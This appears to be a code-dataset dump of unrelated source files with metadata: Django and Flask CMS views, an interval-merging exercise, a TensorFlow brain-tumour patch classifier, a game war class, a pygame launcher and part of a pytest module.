Atividade.objects.get(id=request.session['atividade_id'])\n atividade_atualizada = AtividadeForm(request.POST, instance=antiga_atividade)\n if atividade_atualizada.is_valid():\n atividade_atualizada.save()\n messages.success(request, 'Atividade atualizada com sucesso')\n else:\n messages.warning(request, 'Falha na atualização da Atividade')\n return redirect('atividade_show', request.session['atividade_id'])\n\n\ndef delete(request):\n Atividade.objects.get(id=request.session['atividade_id']).delete()\n del request.session['atividade_id']\n messages.success(request, 'Atividade apagada com sucesso')\n return redirect('requisito_show', request.session['requisito_id'])\n","sub_path":"ref-mac0350/mac0350fase3/atividade/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"333241184","text":"import os\nimport time\n\nfrom flask import render_template, request, redirect, url_for, Blueprint, flash\nfrom flask.ext.login import current_user\n\nfrom MORTWebsite.sql.ORM import BlogPost, User\nfrom MORTWebsite import db\nfrom MORTWebsite.utilities.permissions import cms_access_required, cms_admin_required\nfrom MORTWebsite.utilities.renderer import new_post_to_file, updated_post_to_file\nfrom MORTWebsite import forms\nfrom MORTWebsite.utilities.helpers import flash_errors, dfm_mode_checker\nfrom 
MORTWebsite.sql.ORM import PostCategories\nfrom MORTWebsite.utilities.server_logger import log_event\n\nblog = Blueprint('blog', __name__, url_prefix='/blog')\n\n\n# Index page for blog\n@blog.route('')\n@dfm_mode_checker\ndef blog_index():\n all_posts = db.session.query(BlogPost).order_by(BlogPost.id.desc()).limit(5)\n return render_template('cms/blog/index.html', posts=all_posts, user=User)\n\n\n# View route for specific posts in category\n@blog.route('/category/<category>')\n@dfm_mode_checker\ndef posts_in_category(category):\n posts_in_cat = db.session.query(BlogPost).order_by(BlogPost.id.desc())\n results = []\n for post in posts_in_cat:\n if post.category.category_url == category:\n results.append((post.post_by, post.post_url, post.post_title, post.post_date))\n\n return render_template('cms/blog/list.html', posts=results, user=User, category=category)\n
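\n# Side note (illustrative sketch only, not part of the original module): the loop above\n# filters in Python; since posts expose a 'category' relationship, the same list could\n# likely be fetched directly in SQL, along these lines:\n#\n# posts_in_cat = (db.session.query(BlogPost).join(PostCategories)\n#                 .filter(PostCategories.category_url == category)\n#                 .order_by(BlogPost.id.desc()))\n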
\n\n##################\n# Administration #\n##################\n\n# Blog admin index\n@blog.route('/admin')\n@cms_access_required\ndef blog_overview():\n return render_template('cms/blog/admin/index.html', posts=db.session.query(BlogPost))\n\n\n# New post\n@blog.route('/admin/new', methods=['GET', 'POST'])\n@cms_access_required\ndef new_blog_post():\n form = forms.BlogPost(request.form)\n categories = db.session.query(PostCategories)\n\n if form.validate_on_submit():\n try:\n post_by = current_user.id\n post_date = str(time.strftime(\"%m-%d-%Y\"))\n post_title = form.post_title.data.decode('unicode_escape').encode('ascii', 'ignore')\n post_url = form.post_url.data.lower().decode('unicode_escape').encode('ascii', 'ignore').replace(\" \",\n \"-\").lower()\n post_content = form.post_content.data.decode('unicode_escape').encode('ascii', 'ignore')\n post_category = request.form['post_category'].decode('unicode_escape').encode('ascii', 'ignore')\n\n new_post = BlogPost(post_date, post_by, post_url, post_title, post_content, post_category)\n db.session.add(new_post)\n db.session.commit()\n new_post_to_file(new_post.id, post_date, post_by, post_url, post_title, post_content, post_category)\n\n category = db.session.query(PostCategories).filter(PostCategories.id == post_category).first().category_url\n\n return redirect('/blog/{0}/{1}'.format(category, post_url))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/new-post.html', form=form, categories=categories)\n\n\n# Edit post given post_id\n@blog.route('/admin/edit/<int:post_id>', methods=['GET', 'POST'])\n@cms_access_required\ndef edit_post(post_id):\n form = forms.BlogPost()\n post = db.session.query(BlogPost).filter(BlogPost.id == post_id).first()\n categories = db.session.query(PostCategories)\n\n if form.validate_on_submit():\n try:\n title = form.post_title.data.decode('unicode_escape').encode('ascii', 'ignore')\n url = form.post_url.data.lower().decode('unicode_escape').encode('ascii', 'ignore').replace(\" \",\n \"-\").lower()\n content = request.form['post_content'].decode('unicode_escape').encode('ascii', 'ignore')\n category = request.form['post_category'].decode('unicode_escape').encode('ascii', 'ignore')\n\n old_url = post.post_url\n\n post.post_title = title\n post.post_url = url\n post.post_category = category\n post.post_content = content\n db.session.commit()\n\n updated_post_to_file(post.id, old_url, post.post_date, post.post_by, url, title, content,\n category)\n\n category_url = db.session.query(PostCategories).filter(PostCategories.id == category).first().category_url\n\n return redirect('/blog/{0}/{1}'.format(category_url, url))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/edit-post.html', post=post, form=form, categories=categories)\n\n\n# Delete post given post_id\n@blog.route('/admin/delete/<int:post_id>', methods=['GET'])\n@cms_access_required\ndef delete_post(post_id):\n try:\n post_to_delete = db.session.query(BlogPost).filter(BlogPost.id == post_id).first()\n os.remove('{0}/MORTWebsite/templates/render-files/blog-post/{1}/{2}.html'.format(\n os.environ.get('APPLICATION_ROOT'), post_to_delete.category.category_url, post_to_delete.post_url))\n db.session.delete(post_to_delete)\n db.session.commit()\n except:\n db.session.rollback()\n flash(\"Error deleting!\")\n\n return redirect(url_for('blog.blog_overview'))\n\n\n# List overview of all available blog categories and their URLs\n@blog.route('/admin/categories')\n@cms_access_required\ndef categories_overview():\n return render_template('cms/blog/admin/categories/index.html', categories=db.session.query(PostCategories))\n\n\n# Route to add a new blog category\n@blog.route('/admin/add-category', methods=['GET', 'POST'])\n@cms_access_required\ndef add_category():\n form = forms.CategoryForm()\n\n if form.validate_on_submit():\n try:\n category_name = form.category_name.data\n category = PostCategories(category_name)\n db.session.add(category)\n db.session.commit()\n log_event('INFO', '{0} added new blog category titled \"{1}\"'.format(current_user.username, category_name))\n return redirect(url_for('blog.categories_overview'))\n except:\n db.session.rollback()\n flash(\"Error adding category!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/categories/new-category.html', form=form)\n\n\n# Edit blog category given category_id\n@blog.route('/admin/edit-category/<int:category_id>', methods=['GET', 'POST'])\n@cms_access_required\ndef edit_category(category_id):\n form = forms.CategoryForm()\n category = db.session.query(PostCategories).filter(PostCategories.id == category_id).first()\n\n if form.validate_on_submit():\n try:\n category_name = form.category_name.data\n\n category.category_name = category_name\n db.session.commit()\n\n log_event('INFO', '{0} updated blog category titled \"{1}\"'.format(current_user.username, category_name))\n return redirect(url_for('blog.categories_overview'))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/categories/edit-category.html', form=form, category=category)\n\n\n# Delete blog category given category_id\n@blog.route('/admin/delete-category/<int:category_id>', methods=['GET'])\n@cms_access_required\ndef delete_category(category_id):\n try:\n category_to_delete = db.session.query(PostCategories).filter(PostCategories.id == category_id).first()\n db.session.delete(category_to_delete)\n db.session.commit()\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n\n return redirect(url_for('blog.categories_overview'))\n\n\n# Edit raw HTML for featured categories sidebar\n@blog.route('/admin/edit-featured-categories', methods=['GET', 'POST'])\n@cms_admin_required\ndef edit_featured_categories():\n if request.method == 'GET':\n page = open('MORTWebsite/templates/cms/blog/featured-categories.html', 'r')\n data = page.read()\n return render_template('cms/editor.html', data=data)\n else:\n page = open('MORTWebsite/templates/cms/blog/featured-categories.html', 'w+')\n content = 
request.form['content']\n page.write(content)\n return redirect(url_for('blog.blog_overview'))\n","sub_path":"MORTWebsite/routing/cms/blog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"178666128","text":"# File: Intervals.py\r\n\r\n# Description: Making collapsed intervals in order of size\r\n\r\n# Student Name: Raymond Li\r\n\r\n# Student UT EID: rll2497\r\n\r\n# Partner Name: Kevin Huang\r\n\r\n# Partner UT EID: Kjh2755\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 50205\r\n\r\n# Date Created: 9/6\r\n\r\n# Date Last Modified: 9/9\r\ndef sortList(IntervalList):\r\n sortedList = []\r\n while len(IntervalList) > 0:\r\n pos = 0\r\n minValue = IntervalList[pos][0]\r\n for i in range(len(IntervalList)):\r\n if IntervalList[i][0] < minValue:\r\n minValue = IntervalList [i][0]\r\n pos = i\r\n sortedList.append((IntervalList[pos][0],IntervalList[pos][1]))\r\n IntervalList.pop(pos)\r\n return sortedList\r\n\r\ndef get_non_intersecting_intervals(sortedList):\r\n len_of_list = len(sortedList)\r\n nonIntervalList = []\r\n pos = 0\r\n print(\"Non-intersecting Intervals:\")\r\n while pos < len_of_list:\r\n nextPosition = pos + 1\r\n minVal = sortedList[pos][0]\r\n maxVal = sortedList[pos][1]\r\n while nextPosition < len_of_list and sortedList[nextPosition][0] <= maxVal:\r\n if minVal > sortedList[nextPosition][0]:\r\n minVal = sortedList[nextPosition][0]\r\n if maxVal < sortedList[nextPosition][1]:\r\n maxVal = sortedList[nextPosition][1]\r\n nextPosition = nextPosition + 1\r\n nonIntervalList.append([minVal,maxVal])\r\n print('(' + str(minVal) + ', ' + str(maxVal) + ')')\r\n pos = nextPosition\r\n print(\"\") \r\n \r\n return nonIntervalList\r\n\r\ndef order_by_range(nonIntervalList):\r\n print(\"Non-intersecting Intervals in order of size:\")\r\n while len(nonIntervalList) > 0:\r\n pos = 0\r\n difference = nonIntervalList[pos][1] - nonIntervalList[pos][0]\r\n for i in range(len(nonIntervalList)):\r\n if nonIntervalList[i][1] - nonIntervalList[i][0] < difference:\r\n difference = nonIntervalList[i][1] - nonIntervalList[i][0]\r\n pos = i\r\n print('(' + str(nonIntervalList[pos][0]) + ', ' + str(nonIntervalList[pos][1]) + ')')\r\n nonIntervalList.pop(pos)\r\n \r\ndef main():\r\n\r\n inf = open(\"intervals.txt\",\"r\")\r\n \r\n IntervalList = []\r\n line = inf.readline()\r\n\r\n while line != \"\":\r\n\r\n LineArray = line.strip('\\n').split(\" \")\r\n IntervalList.append((int(LineArray[0]),int(LineArray[1])))\r\n line = inf.readline()\r\n \r\n inf.close()\r\n #sorting \r\n newList = sortList(IntervalList)\r\n #make intervals\r\n intervalList = get_non_intersecting_intervals(newList)\r\n #put in order of size\r\n order_by_range(intervalList)\r\n \r\n \r\n \r\n\r\nmain()","sub_path":"Intervals.py","file_name":"Intervals.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"528436267","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport SimpleITK as sitka\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom scipy.sparse import coo_matrix\nfrom sklearn.utils import shuffle\nimport os\nfrom scipy.spatial.distance import dice\n\n\n# ## Predspracovanie dat\n\n# 
In[2]:\n\n\nsize = 15\nstep = 5\npad = 5\nvolumes = 75 # 75 volumes\npatches = [[],[],[],[],[]]\nvalid_x = [[],[],[],[],[]]\nvalid_y = [[],[],[],[],[]]\nlabels = [[],[],[],[],[]]\nsamples = 0\n\n\n# In[3]:\n\n\nd = [x[0] for x in os.walk('F:\miccai_data\MICCAI_BraTS17_Data_Training\LGG')][1:]\n\n\nprint('init')\n#scaler_t = True\n#scaler = StandardScaler()\nfor sample in d:\n # Load the images\n image = [sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_flair.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t1.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t1ce.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t2.nii.gz', sitka.sitkFloat32))]\n seg = sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_seg.nii.gz', sitka.sitkInt32))\n # change layout from NCHW to NHWC\n image = np.swapaxes(np.reshape(image, (4, 155*240*240)), 0,1)\n image = np.reshape(image, (155,240,240, 4))\n\n #Padding\n if pad != 0:\n image = np.lib.pad(image, pad_width=((pad, pad), (pad, pad), (pad, pad), (0, 0)),\n mode='constant',\n constant_values=(image[0][0][0][0]))\n\n\n seg = np.lib.pad(seg,\n pad_width=((pad, pad), (pad, pad), (pad, pad)),\n mode='constant',\n constant_values=(seg[0][0][0]))\n # Create patches\n for s in range(0, 155+2*pad-size+1, step):\n for h in range(0, 240+2*pad-size+1, step):\n for w in range(0, 240+2*pad-size+1, step):\n patch = image[s:size+s, h:h+size, w:size+w, :]\n if patch[size//2,size//2,size//2,:].max() != 0:\n lab = seg[s+pad:s+pad+step, h+pad:h+pad+step, w+pad:w+pad+step]\n lab = np.bincount(lab.reshape(-1)).argmax()\n patches[lab] += [patch]\n samples += 1\n\nprint(samples, 'samples')\nprint('end')\n\n\n# # Split into training and validation sets\n\n# In[4]:\n\n\nfor x in range(5):\n if x > 0:\n label = [1]*len(patches[x])\n else:\n label = [0]*len(patches[x])\n patches[x], valid_x[x], labels[x], valid_y[x] = train_test_split(patches[x], label, test_size=0.2, random_state=42)\n\n\n\n# In[5]:\n\n\nfor x in range(5):\n print(len(patches[x]))\n print(len(valid_x[x]))\n\n\n# In[6]:\n\n\npatches[0] = patches[0][:500000]\nlabels[0] = labels[0][:500000]\nvalid_x[0] = valid_x[0][:15000]\nvalid_y[0] = valid_y[0][:15000]\nfor x in range(1,5):\n for y in range(len(labels[x])):\n if x == 4:\n k = 15\n else:\n k = 8\n # oversample minority classes: duplicate each sample k times\n patches[x] += [patches[x][y]]*k\n labels[x] += [labels[x][y]]*k\n\n\n# In[7]:\n\n\nfor x in range(5):\n print(len(patches[x]))\n print(len(valid_x[x]))\n\npatches = patches[0] + patches[1] + patches[2] + patches[4]\nlabels = labels[0] + labels[1] + labels[2] + labels[4]\n\nvalid_x = valid_x[0] + valid_x[1] + valid_x[2] + valid_x[4]\nvalid_y = valid_y[0] + valid_y[1] + valid_y[2] + valid_y[4]\n\nprint(np.shape(valid_x))\nprint(len(patches))\nprint(np.shape(patches[0]))\n\n\n# In[ ]:\n\n\npatches, labels = shuffle(patches, labels, random_state=13)\ndata_x = []\ndata_y = []\nbatch_size = 16\nwhile len(patches) > 0:\n print('k')\n if len(patches) > batch_size:\n data_x += [np.array(patches[:batch_size])]\n data_y += [np.array(labels[:batch_size]).reshape(-1,1)]\n else:\n data_x += [np.array(patches[:])]\n data_y += [np.array(labels[:]).reshape(-1,1)]\n print('k')\n patches = patches[batch_size:]\n labels = labels[batch_size:]\n\nprint('data ready')\nprint(len(data_x))\n# In[8]:\n\n\n
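# Illustrative only (not part of the original notebook): the generator defined below yields\n# minibatches; a typical consumption pattern looks like\n#\n#   for batch_x, batch_y in get_batch(some_patches, some_labels, batch_size=16):\n#       ...  # batch_x: up to 16 patches of shape (15, 15, 15, 4); batch_y: (n, 1) labels\n#\n# where 'some_patches'/'some_labels' are placeholder names for lists built as above.\n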
def get_batch(data_x, data_y, batch_size=128):\n data_x, data_y = shuffle(data_x, data_y, random_state=0)\n data_y = np.reshape(data_y, (-1, 1))\n for x in range(((data_y.shape[0]+batch_size-1)//batch_size)):\n if (x+1)*batch_size > data_y.shape[0]:\n yield data_x[x*batch_size:], np.reshape(data_y[x*batch_size:], (-1, 1))\n else:\n yield data_x[x*batch_size:(x+1)*batch_size], np.reshape(data_y[x*batch_size:(x+1)*batch_size], (-1, 1))\n\n\n\n# In[9]:\n\n\ndef get_result_batch(data_x, batch_size=128):\n data_x = np.array(data_x)\n for x in range(((data_x.shape[0]+batch_size-1)//batch_size)):\n if (x+1)*batch_size > data_x.shape[0]:\n yield data_x[x*batch_size:]\n else:\n yield data_x[x*batch_size:(x+1)*batch_size]\n\n\n# In[10]:\n\n\nsess = tf.Session()\n\n\n# In[11]:\n\n\n# Training Parameters\nlearning_rate = 0.001\nnum_steps = 1\nbatch_size = 128\ndisplay_step = 10\n\n# Network Parameters\nnum_input = 15 # input patch shape is (15, 15, 15)\ninput_dim = 15*4 # channel depth after reshape: 15 slices x 4 modalities\nnum_classes = 2 # 2 classes (0 - non-tumor, 1 - tumor)\ndropout = 0.75 # Dropout, probability to keep units\n\n# tf Graph input\nX = tf.placeholder(tf.float32, [None, num_input, num_input, num_input, 4], name=\"INPUT\")\nY = tf.placeholder(tf.int32, [None, 1], name=\"OUTPUT\")\nkeep_prob = tf.placeholder(tf.float32, name=\"dropOut\") # dropout (keep probability)\n\n\n# Create some wrappers for simplicity\ndef conv3d(x, W, b, strides=[1, 1, 1, 1, 1]):\n # Conv3D wrapper, with bias and relu activation\n x = tf.nn.conv3d(x, W, strides=strides, padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n\n# Create some wrappers for simplicity\ndef conv2d(x, W, b, strides=[1, 1, 1, 1]):\n # Conv2D wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=strides, padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n#\n# def maxpool2d(x, k=2):\n# # MaxPool2D wrapper\n# return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],\n# padding='SAME')\n\n\n# 3,3,3 vs 3,3\n\n# Create model\ndef conv_net(x, weights, biases, dropout):\n # Reshape to match picture format [Height x Width x Channel]\n # Tensor input becomes 4-D: [Batch Size, Height, Width, Channel]\n x = tf.reshape(x, shape=[-1, size, size, size*4]) # couldn't this get mixed up?\n\n # Convolution Layer\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\n\n # Convolution Layer\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n\n # Convolution Layer\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n conv4 = conv2d(conv3, weights['wc4'], biases['bc4'])\n\n # Fully connected layer\n # Reshape conv4 output to fit fully connected layer input\n fc1 = tf.reshape(conv4, [-1, size*size*254])\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\n fc1 = tf.nn.relu(fc1)\n # Apply Dropout\n fc1 = tf.nn.dropout(fc1, dropout)\n\n # Output, class prediction\n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\n return out\n\n\n\n# Store layers weight & bias\nweights = {\n # 3x3 conv, 60 inputs, 64 outputs\n 'wc1': tf.Variable(tf.random_normal([3, 3, 60, 64])),\n # 3x3 conv, 64 inputs, 128 outputs\n 'wc2': tf.Variable(tf.random_normal([3, 3, 64, 128])),\n # 3x3 conv, 128 inputs, 192 outputs\n 'wc3': tf.Variable(tf.random_normal([3, 3, 128, 192])),\n # 3x3 conv, 192 inputs, 254 outputs\n 'wc4': tf.Variable(tf.random_normal([3, 3, 192, 254])),\n # fully connected, size*size*254 inputs, 512 outputs\n 'wd1': tf.Variable(tf.random_normal([size*size*254, 512])),\n # 512 inputs, num_classes outputs (class 
prediction)\n 'out': tf.Variable(tf.random_normal([512, num_classes]))\n}\n\nbiases = {\n 'bc1': tf.Variable(tf.random_normal([64])),\n 'bc2': tf.Variable(tf.random_normal([128])),\n 'bc3': tf.Variable(tf.random_normal([192])),\n 'bc4': tf.Variable(tf.random_normal([254])),\n 'bd1': tf.Variable(tf.random_normal([512])),\n 'out': tf.Variable(tf.random_normal([num_classes]))\n}\n\n# Construct model\nlogits = conv_net(X, weights, biases, keep_prob)\nprediction = tf.nn.softmax(logits)\noutput = tf.argmax(prediction, 1)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=tf.one_hot(Y,2)))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n\n# Evaluate model\ncorrect_pred = tf.equal(output, tf.argmax(tf.one_hot(Y, 2), 2))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n#acc, acc_op = tf.metrics.accuracy(labels=tf.argmax(tf.one_hot(Y, 5), 0), predictions=tf.argmax(prediction,0))\n\n\n# Initialize the variables (i.e. assign their default value)\ninit = tf.global_variables_initializer()\nprint('Graph created')\n\n\n# In[12]:\n\n\nsess.run(init)\nprint('init')\n\n\n# In[13]:\n\n\nprint(sess.run(output, {X:patches[0:4], Y:np.reshape(labels[0:4], (-1,1)), keep_prob: 0.8}))\n\n\n# In[ ]:\n\n\nprint('start')\n#TRAINING\nfor step in range(5):\n print('Epoch:', step)\n # Run optimization op (backprop)\n i = 0\n for batch_x, batch_y in get_batch(patches, labels, batch_size=16):\n print('k')\n sess.run(train_op, {X: batch_x,\n Y: batch_y,\n keep_prob: 0.7})\n\n if i % 100 == 0:\n accccu = sess.run(accuracy, {X: batch_x, Y:batch_y, keep_prob:1.0})\n acc = 0\n loss = 0\n g = 0\n for batch_xx, batch_yy in get_batch(valid_x[step*60000:(step+1)*60000], valid_y[step*60000:(step+1)*60000],\n batch_size=16):\n g +=1\n acc_c, loss_c = sess.run([accuracy, loss_op], {X: batch_xx, Y: batch_yy, keep_prob: 1})\n acc += acc_c\n loss += loss_c\n print('Average accurtacy of valid:', '{:.4f}'.format(acc/g),\n 'Loss: ', '{:.4f}'.format(loss/g),\n 'Actual batch acc: ', '{:.4f}'.format(accccu))\n i += 1\n\n # print(batch_y)\n # print(sess.run(prediction, {X:batch_x, keep_prob: 1}))\n\nprint('end')\n\n\n# In[ ]:\n\n\nout = []\nfor batch_x in get_result_batch(patches, batch_size=100):\n i += 1\n out_c = sess.run(output, {X: batch_x, keep_prob: 1})\n #print(\"Step \", i,\", Minibatch Loss= \" + \"{:.4f}\".format(loss) + \", Training Accuracy= \" + \"{:.3f}\".format(acc))\n out = np.append(out, out_c)\n\n\n\n# In[ ]:\n\n\nprint(np.shape(patches))\n\n\n# In[ ]:\n\n\nf1_score(valid_y, out, average='macro')\n\n\n# In[ ]:\n\n\nres = 0\nfor x in range(np.shape(label)[0]):\n if out[x] == label[x]:\n res += 1\n\nprint(res/np.shape(out)[0])\n\n\n# In[ ]:\n\n\nfor x in range(np.shape(label)[0]):\n if label[x] != 0:\n print(out[x], label[x])\n\n\n# In[ ]:\n\n\nfor x in range(np.shape(label)[0]):\n print(label[x])\n","sub_path":"iit_src/RegionCNN-clasfy/iit_src.py","file_name":"iit_src.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"553278346","text":"'''\nCopyright (c) 2012-2015, Matthieu Nué\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n* 
Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, \nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR \nPURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR \nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT \nOF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS \nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN \nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) \nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF \nTHE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nimport heyaml\nfrom decorators import *\nfrom functions import *\n\n@visible(aggressors='for_all', defenders='for_all')\n@relations(aggressors=\"country\", defenders=\"country\")\nclass War(heyaml.HEYAMLObject):\n yaml_tag = '!War'\n def new_yaml(self, idd, aggressors, defenders):\n self.idd = idd\n self._aggressors = aggressors \n self.aggressors = []\n self._defenders = defenders\n self.defenders = []\n self.battles = set()\n \n def new(self, idd, aggressors, defenders):\n self.idd = idd\n self._aggressors = [] \n self.aggressors = aggressors\n self._defenders = []\n self.defenders = defenders\n self.battles = set()\n War.changed_attribute[\"aggressors\"].add(self.idd)\n War.changed_attribute[\"defenders\"].add(self.idd)\n self.init()\n \n def init(self):\n for aggressor in self.aggressors:\n aggressor.add_war_aggressor(self)\n for defender in self.defenders:\n defender.add_war_defender(self)\n \n def delete(self):\n for aggressor in self.aggressors:\n aggressor.remove_war_aggressors(self)\n for defender in self.defenders:\n defender.remove_war_defenders(self)\n callback = []\n for battle in self.battles:\n callback.append((\"delete_battle\",(battle)))\n return callback\n \n def add_aggressor(self, country):\n self.aggressors.append(country)\n War.changed_attribute[\"aggressors\"].add(self.idd)\n return self.aggressors\n \n def remove_aggressor(self, country):\n self.aggressors.remove(country)\n War.changed_attribute[\"aggressors\"].add(self.idd)\n return self.aggressors\n\n def add_defender(self, country):\n self.defenders.append(country)\n War.changed_attribute[\"defenders\"].add(self.idd)\n return self.defenders\n \n def remove_defender(self, country):\n self.defenders.remove(country)\n War.changed_attribute[\"defenders\"].add(self.idd)\n return self.defenders\n \n def add_battle(self, battle):\n self.battles.add(battle)\n return self.battles\n \n def remove_battle(self, battle):\n self.battles.remove(battle)\n return self.battles\n \n def get_allies(self, country):\n for c in self.aggressors:\n if c == country:\n return self.aggressors\n for c in self.defenders:\n if c == country:\n return self.defenders\n return []\n \n def get_enemies(self, country):\n for c in self.aggressors:\n if c == country:\n return self.defenders\n for c in self.defenders:\n if c == country:\n return self.aggressors\n return []\n \n","sub_path":"src/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"137824344","text":"import pygame\nimport sys\nimport pglobals as g\nfrom scenes import opening\nimport pygame.freetype\nimport math\n\ng.init()\n\nglobalClock = pygame.time.Clock()\n\nscreenSize = width, height = g.screenWidth, g.screenHeight\nFPS = 60\n\npygame.init()\npygame.mixer.init()\n\ntitleFont = pygame.freetype.Font(\"assets/misc/titleFont.ttf\", 120)\npokemonLogo = pygame.image.load(\"assets/images/pokemonLogo.png\")\nscreen = pygame.display.set_mode((width, height))\nstartMenu = True\n\nif __name__ == \"__main__\":\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.mixer.music.load(\"assets/audio/intro2.mp3\")\n pygame.mixer.music.play()\n if startMenu == True:\n opening.main(screen, g, titleFont, pygame.transform.scale(pokemonLogo, (math.floor(pokemonLogo.get_size()[0]/3.5), math.floor(pokemonLogo.get_size()[1]/3.5))), pygame.image.load(\"assets/images/missingTex.png\"))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"521951347","text":"\"\"\"Test `ScoredSentence`\"\"\"\nimport typing\n\nimport kinda\n\nfrom src.oolongt.summarizer.scored_sentence import (\n ScoredSentence, calc_decile, score_keyword_frequency, score_position,\n score_total)\nfrom tests.helpers import check_exception\nfrom tests.params.summarizer import (\n get_inst_comp, param_calc_decile, param_comp, param_score_position,\n param_scored_sentence___init__, param_scored_sentence__init_,\n param_scored_sentence__repr__, param_scored_sentence__str__,\n param_sentences)\nfrom tests.typings import Sample, SampleSentence\n\n\n@param_calc_decile()\ndef test_calc_decile(\n index: int,\n total: int,\n expected: typing.Union[int, Exception]):\n \"\"\"Test `calc_decile` in summarizer subpackage\n\n Arguments:\n index {int} -- index of sentence position (0-based)\n total {int} -- total number of sentences\n expected {typing.Union[int, Exception]} --\n decile of position (0-9) or error\n \"\"\"\n try:\n received = calc_decile(index, total)\n\n except Exception as err: # pylint: disable=broad-except\n received = check_exception(err, expected)\n\n assert received == expected\n\n\n@param_score_position()\ndef test_score_position(index: int, expected: typing.Union[float, Exception]):\n \"\"\"Test `score_position` in summarizer subpackage\n\n Arguments:\n index {int} -- index of sentence position (0-based)\n expected {typing.Union[float, Exception]} -- position score or error\n \"\"\"\n total = 1000\n\n try:\n received = score_position(index, total)\n test = kinda.eq(received, expected)\n\n except Exception as err: # pylint: disable=broad-except\n received = check_exception(err, expected)\n test = (received == expected)\n\n assert test\n\n\n# pylint: disable=unused-argument\n@param_sentences()\ndef test_score_keyword_frequency(sample: Sample, sentence: SampleSentence):\n \"\"\"Test `score_keyword_frequency` in summarizer subpackage\n\n Arguments:\n sample {Sample} -- sample content\n sentence {SampleSentence} -- sentence from sample\n \"\"\"\n expected = sentence.keyword_score\n received = score_keyword_frequency(sentence.dbs_score, sentence.sbs_score)\n\n assert kinda.eq(received, expected)\n\n\n@param_sentences()\ndef test_score_total(sample: Sample, sentence: SampleSentence):\n \"\"\"Test `score_total` in summarizer subpackage\n\n Arguments:\n sample {Sample} -- sample content\n sentence {SampleSentence} -- sentence from 
